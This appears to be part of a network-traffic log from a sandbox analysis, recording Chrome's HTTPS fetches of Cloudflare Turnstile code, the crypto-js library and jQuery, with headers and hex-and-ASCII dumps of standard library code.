                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1749721104.17.25.144436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:18 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:18 UTC953INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:18 GMT
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: W/"61182885-40eb"
                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 74833
                                                                            Expires: Tue, 09 Dec 2025 14:36:18 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGVnuiQFPsidmmPozAbaTkPAAAAKU1hX8mnnEQ5aaJ5jsR8gxwVwcXXW2ukKfF%2FJayFoeF4fRvXdhXuldiLgVtErq5csc7C8mDlR8b2wYNVeAkyYVSYMcswM81yBzm42bVBM3Ndm"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fc95eb30c86-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:18 UTC416INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                            Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66
                                                                            Data Ascii: alThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||f
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72
                                                                            Data Ascii: his);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{r
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29
                                                                            Data Ascii: &&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29
                                                                            Data Ascii: this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36
                                                                            Data Ascii: 0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f
                                                                            Data Ascii: teOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:functio
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56
                                                                            Data Ascii: 64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUV
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73
                                                                            Data Ascii: t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._has
                                                                            2024-12-19 14:36:18 UTC1369INData Raw: 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c
                                                                            Data Ascii: m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1749723151.101.2.1374436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:18 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                            Host: code.jquery.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:19 UTC613INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 89501
                                                                            Server: nginx
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                            ETag: "28feccc0-15d9d"
                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                            Accept-Ranges: bytes
                                                                            Date: Thu, 19 Dec 2024 14:36:18 GMT
                                                                            Age: 3140510
                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740048-EWR
                                                                            X-Cache: HIT, HIT
                                                                            X-Cache-Hits: 2774, 7
                                                                            X-Timer: S1734618979.964221,VS0,VE0
                                                                            Vary: Accept-Encoding
                                                                            2024-12-19 14:36:19 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
